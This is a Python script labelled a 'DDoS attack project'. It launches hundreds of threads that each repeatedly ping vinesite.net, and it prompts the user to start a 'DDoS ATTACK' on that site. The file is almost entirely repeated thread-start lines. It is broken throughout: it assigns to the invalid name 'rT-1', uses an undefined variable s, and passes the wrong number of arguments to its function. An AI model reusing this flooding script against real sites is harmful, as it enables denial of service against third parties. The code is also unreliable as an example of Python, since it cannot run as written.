#DDoS attack project
import os,threading

def DDoS(url):
    while True:
        os.system('ping vinesite.net')

def gen(c):
    a=open('ddos.py','w')
    for i in range(c):
        a.write('rT'+str(i-1)+'= threading.Thread(target = DDoS, args = ("RecvThread",s))\n')
        a.write('rT'+str(i-1)+'.start()\n')
        print('[ DDoS HIT ] :: Generated new unit number='+str(i-1))

input('Press any key for start DDoS ATTACK FOR SITE: vinesite.net')
rT-1= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT-1.start()
rT0= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT0.start()
rT1= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT1.start()
rT2= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT2.start()
rT3= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT3.start()
rT4= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT4.start()
rT5= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT5.start()
rT6= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT6.start()
rT7= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT7.start()
rT8= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT8.start()
rT9= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT9.start()
rT10= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT10.start()
rT11= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT11.start()
rT12= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT12.start()
rT13= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT13.start()
rT14= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT14.start()
rT15= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT15.start()
rT16= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT16.start()
rT17= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT17.start()
rT18= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT18.start()
rT19= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT19.start()
rT20= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT20.start()
rT21= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT21.start()
rT22= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT22.start()
rT23= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT23.start()
rT24= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT24.start()
rT25= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT25.start()
rT26= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT26.start()
rT27= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT27.start()
rT28= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT28.start()
rT29= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT29.start()
rT30= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT30.start()
rT31= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT31.start()
rT32= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT32.start()
rT33= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT33.start()
rT34= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT34.start()
rT35= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT35.start()
rT36= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT36.start()
rT37= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT37.start()
rT38= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT38.start()
rT39= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT39.start()
rT40= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT40.start()
rT41= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT41.start()
rT42= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT42.start()
rT43= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT43.start()
rT44= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT44.start()
rT45= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT45.start()
rT46= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT46.start()
rT47= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT47.start()
rT48= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT48.start()
rT49= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT49.start()
rT50= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT50.start()
rT51= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT51.start()
rT52= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT52.start()
rT53= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT53.start()
rT54= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT54.start()
rT55= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT55.start()
rT56= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT56.start()
rT57= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT57.start()
rT58= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT58.start()
rT59= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT59.start()
rT60= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT60.start()
rT61= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT61.start()
rT62= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT62.start()
rT63= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT63.start()
rT64= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT64.start()
rT65= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT65.start()
rT66= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT66.start()
rT67= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT67.start()
rT68= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT68.start()
rT69= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT69.start()
rT70= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT70.start()
rT71= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT71.start()
rT72= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT72.start()
rT73= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT73.start()
rT74= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT74.start()
rT75= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT75.start()
rT76= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT76.start()
rT77= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT77.start()
rT78= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT78.start()
rT79= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT79.start()
rT80= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT80.start()
rT81= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT81.start()
rT82= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT82.start()
rT83= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT83.start()
rT84= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT84.start()
rT85= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT85.start()
rT86= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT86.start()
rT87= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT87.start()
rT88= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT88.start()
rT89= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT89.start()
rT90= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT90.start()
rT91= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT91.start()
rT92= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT92.start()
rT93= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT93.start()
rT94= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT94.start()
rT95= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT95.start()
rT96= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT96.start()
rT97= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT97.start()
rT98= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT98.start()
rT99= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT99.start()
rT100= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT100.start()
rT101= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT101.start()
rT102= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT102.start()
rT103= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT103.start()
rT104= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT104.start()
rT105= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT105.start()
rT106= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT106.start()
rT107= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT107.start()
rT108= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT108.start()
rT109= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT109.start()
rT110= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT110.start()
rT111= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT111.start()
rT112= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT112.start()
rT113= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT113.start()
rT114= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT114.start()
rT115= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT115.start()
rT116= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT116.start()
rT117= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT117.start()
rT118= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT118.start()
rT119= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT119.start()
rT120= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT120.start()
rT121= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT121.start()
rT122= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT122.start()
rT123= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT123.start()
rT124= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT124.start()
rT125= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT125.start()
rT126= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT126.start()
rT127= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT127.start()
rT128= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT128.start()
rT129= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT129.start()
rT130= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT130.start()
rT131= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT131.start()
rT132= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT132.start()
rT133= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT133.start()
rT134= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT134.start()
rT135= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT135.start()
rT136= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT136.start()
rT137= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT137.start()
rT138= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT138.start()
rT139= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT139.start()
rT140= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT140.start()
rT141= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT141.start()
rT142= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT142.start()
rT143= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT143.start()
rT144= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT144.start()
rT145= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT145.start()
rT146= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT146.start()
rT147= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT147.start()
rT148= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT148.start()
rT149= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT149.start()
rT150= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT150.start()
rT151= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT151.start()
rT152= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT152.start()
rT153= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT153.start()
rT154= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT154.start()
rT155= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT155.start()
rT156= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT156.start()
rT157= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT157.start()
rT158= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT158.start()
rT159= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT159.start()
rT160= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT160.start()
rT161= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT161.start()
rT162= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT162.start()
rT163= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT163.start()
rT164= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT164.start()
rT165= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT165.start()
rT166= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT166.start()
rT167= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT167.start()
rT168= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT168.start()
rT169= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT169.start()
rT170= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT170.start()
rT171= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT171.start()
rT172= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT172.start()
rT173= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT173.start()
rT174= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT174.start()
rT175= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT175.start()
rT176= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT176.start()
rT177= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT177.start()
rT178= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT178.start()
rT179= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT179.start()
rT180= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT180.start()
rT181= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT181.start()
rT182= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT182.start()
rT183= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT183.start()
rT184= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT184.start()
rT185= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT185.start()
rT186= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT186.start()
rT187= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT187.start()
rT188= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT188.start()
rT189= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT189.start()
rT190= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT190.start()
rT191= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT191.start()
rT192= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT192.start()
rT193= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT193.start()
rT194= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT194.start()
rT195= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT195.start()
rT196= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT196.start()
rT197= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT197.start()
rT198= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT198.start()
rT199= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT199.start()
rT200= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT200.start()
rT201= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT201.start()
rT202= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT202.start()
rT203= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT203.start()
rT204= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT204.start()
rT205= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT205.start()
rT206= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT206.start()
rT207= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT207.start()
rT208= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT208.start()
rT209= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT209.start()
rT210= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT210.start()
rT211= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT211.start()
rT212= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT212.start()
rT213= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT213.start()
rT214= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT214.start()
rT215= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT215.start()
rT216= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT216.start()
rT217= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT217.start()
rT218= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT218.start()
rT219= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT219.start()
rT220= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT220.start()
rT221= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT221.start()
rT222= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT222.start()
rT223= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT223.start()
rT224= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT224.start()
rT225= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT225.start()
rT226= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT226.start()
rT227= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT227.start()
rT228= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT228.start()
rT229= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT229.start()
rT230= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT230.start()
rT231= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT231.start()
rT232= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT232.start()
rT233= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT233.start()
rT234= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT234.start()
rT235= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT235.start()
rT236= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT236.start()
rT237= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT237.start()
rT238= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT238.start()
rT239= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT239.start()
rT240= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT240.start()
rT241= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT241.start()
rT242= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT242.start()
rT243= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT243.start()
rT244= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT244.start()
rT245= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT245.start()
rT246= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT246.start()
rT247= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT247.start()
rT248= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT248.start()
rT249= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT249.start()
rT250= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT250.start()
rT251= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT251.start()
rT252= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT252.start()
rT253= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT253.start()
rT254= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT254.start()
rT255= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT255.start()
rT256= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT256.start()
rT257= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT257.start()
rT258= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT258.start()
rT259= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT259.start()
rT260= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT260.start()
rT261= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT261.start()
rT262= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT262.start()
rT263= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT263.start()
rT264= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT264.start()
rT265= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT265.start()
rT266= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT266.start()
rT267= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT267.start()
rT268= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT268.start()
rT269= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT269.start()
rT270= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT270.start()
rT271= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT271.start()
rT272= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT272.start()
rT273= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT273.start()
rT274= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT274.start()
rT275= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT275.start()
rT276= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT276.start()
rT277= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT277.start()
rT278= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT278.start()
rT279= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT279.start()
rT280= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT280.start()
rT281= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT281.start()
rT282= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT282.start()
rT283= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT283.start()
rT284= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT284.start()
rT285= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT285.start()
rT286= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT286.start()
rT287= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT287.start()
rT288= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT288.start()
rT289= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT289.start()
rT290= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT290.start()
rT291= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT291.start()
rT292= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT292.start()
rT293= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT293.start()
rT294= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT294.start()
rT295= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT295.start()
rT296= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT296.start()
rT297= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT297.start()
rT298= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT298.start()
rT299= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT299.start()
rT300= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT300.start()
rT301= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT301.start()
rT302= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT302.start()
rT303= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT303.start()
rT304= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT304.start()
rT305= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT305.start()
rT306= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT306.start()
rT307= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT307.start()
rT308= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT308.start()
rT309= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT309.start()
rT310= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT310.start()
rT311= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT311.start()
rT312= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT312.start()
rT313= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT313.start()
rT314= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT314.start()
rT315= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT315.start()
rT316= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT316.start()
rT317= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT317.start()
rT318= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT318.start()
rT319= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT319.start()
rT320= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT320.start()
rT321= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT321.start()
rT322= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT322.start()
rT323= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT323.start()
rT324= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT324.start()
rT325= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT325.start()
rT326= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT326.start()
rT327= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT327.start()
rT328= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT328.start()
rT329= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT329.start()
rT330= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT330.start()
rT331= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT331.start()
rT332= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT332.start()
rT333= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT333.start()
rT334= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT334.start()
rT335= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT335.start()
rT336= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT336.start()
rT337= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT337.start()
rT338= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT338.start()
rT339= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT339.start()
rT340= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT340.start()
rT341= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT341.start()
rT342= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT342.start()
rT343= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT343.start()
rT344= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT344.start()
rT345= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT345.start()
rT346= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT346.start()
rT347= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT347.start()
rT348= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT348.start()
rT349= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT349.start()
rT350= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT350.start()
rT351= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT351.start()
rT352= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT352.start()
rT353= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT353.start()
rT354= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT354.start()
rT355= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT355.start()
rT356= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT356.start()
rT357= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT357.start()
rT358= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT358.start()
rT359= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT359.start()
rT360= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT360.start()
rT361= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT361.start()
rT362= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT362.start()
rT363= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT363.start()
rT364= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT364.start()
rT365= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT365.start()
rT366= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT366.start()
rT367= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT367.start()
rT368= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT368.start()
rT369= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT369.start()
rT370= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT370.start()
rT371= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT371.start()
rT372= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT372.start()
rT373= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT373.start()
rT374= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT374.start()
rT375= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT375.start()
rT376= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT376.start()
rT377= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT377.start()
rT378= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT378.start()
rT379= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT379.start()
rT380= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT380.start()
rT381= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT381.start()
rT382= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT382.start()
rT383= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT383.start()
rT384= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT384.start()
rT385= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT385.start()
rT386= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT386.start()
rT387= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT387.start()
